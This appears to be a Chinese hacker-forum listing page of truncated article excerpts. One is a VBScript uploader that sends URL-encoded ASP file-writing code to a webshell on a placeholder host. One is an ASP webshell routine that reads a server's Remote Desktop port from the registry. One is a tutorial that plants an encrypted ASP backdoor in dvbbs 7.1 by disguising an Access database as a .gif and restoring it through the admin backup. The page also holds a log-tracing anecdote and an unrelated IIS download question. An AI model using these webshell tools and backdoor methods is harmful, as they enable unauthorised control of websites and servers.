来自:情感网络联盟
with wscript
if .arguments.count<2 then .quit
ffn=replace(.arguments(1),”\”,”%5C”):ffn=replace(ffn,”:”,”%3A”):ffn=replace(ffn,”~”,”%7E”)
url= “http://www.xxxx.com/a.asp?a=with+server.createobject%28%22adodb.stream%22%29%0D%0A.type%3D1%0D%0A.open%0D%0A.write+request.binaryread%28request.totalbytes%29%0D%0A.savetofile+%22″&ffn&”%22%2C2%0D%0Aend+with%0D%0AResponse.end”
fn=.arguments(0)
阅读全文 »
作者:HaK_BaN[B.C.T] http://www.cnbct.org
以前黑站黑了很多,但是就没有想过会不会被追踪到,都没有想过怎么去擦自己的屁股,万万没想到在自己不再黑站的时候,却发现了自己的BBS被黑了。根据当初的判断,BBS程序是我们BCT小组成员编写的Lvbbs不会存在着上传漏洞和SQL注入啊!就算能拿到权限都不可能可以弄出个webshell出来,不是程序的漏洞的话,就一定是服务器的安全问题了,以前整天拿着旁注去黑站,这下子好玩了,竟然被别人拿去黑自己的网站了。所以就硬着头皮去找网管问个究竟,怎么知道网管还说我自己的问题,要我自己去找气死我啊。
那只好做一回网管了,如果你是网管你会如何去追查问题的来源了?程序问题就去查看“事件查看器”,如果是IIS问题当然是查看IIS日志了!系统文件夹的system32低下的logfile有所有的IIS日志,用来记录服务器所有访问记录。因为是虚拟主机的用户,所以每个用户都配置独立的IIS日志目录,从里面的日志文件就可以发现入侵者入侵BBS的资料了,所以下载了有关时间段的所有日志下来进行分析,发现了很多我自己都不知道资料!哈哈哈,这下子就知道入侵者是怎么入侵我的BBS了。
阅读全文 »
作者:kevin1986 来自:邪恶八进制 中国
sub get_terminal_port()
terminal_port_path=”HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp\”
terminal_port_key=”PortNumber”
termport=wsh.regread(terminal_port_path&terminal_port_key)
if termport=”” or err.number<>0 then
response.write “无法得到终端服务端口。请检查权限是否已经受到限制。<br>”
else
response.write “当前终端服务端口: “&termport&”<br>”
end if
end sub
文章作者:喜欢忧伤
信息来源:邪恶八进制安全小组
背景:
dvbbs7.1在后台备份里面加了access数据库检查了.所以原来的gif图片恢复成后门已经不行了
解决办法:
我把asp木马插入到数据库里,然后恢复。这样肯定检查肯定可以通过的。
具体过程:
前提:
(偶以默认的安装情况为准,具体情况的把握靠自己了.)
你得到论坛dvbbs7.1后台。
1.偶已经作好一个数据库了:里面插入了加密的asp后门[就是那个写马的后门]
同时已经修改名字成dvbbsToshell.gif(文章最后有下载)了
===补充下:关键是因为这个图片是access数据库才有用[详细解释见最后]===
阅读全文 »
我XP的系统,刚才想装个IIS,但是手里又没系统盘,我的系统盘是个GHOST的..
又懒得往街上跑去买,就想去网上找个下载回来用..
不错,找到是找到了
http://www.dzgd.com/download/download/iis5.1.rar
http://fj01.now.net.cn:7751/www.webjx.net/software/200504091iis51.rar
这两个都可以下载,但是到了msmsgs.exe这个文件就卡到那了。没有这个文件 .
郁闷死了。.. :sad:
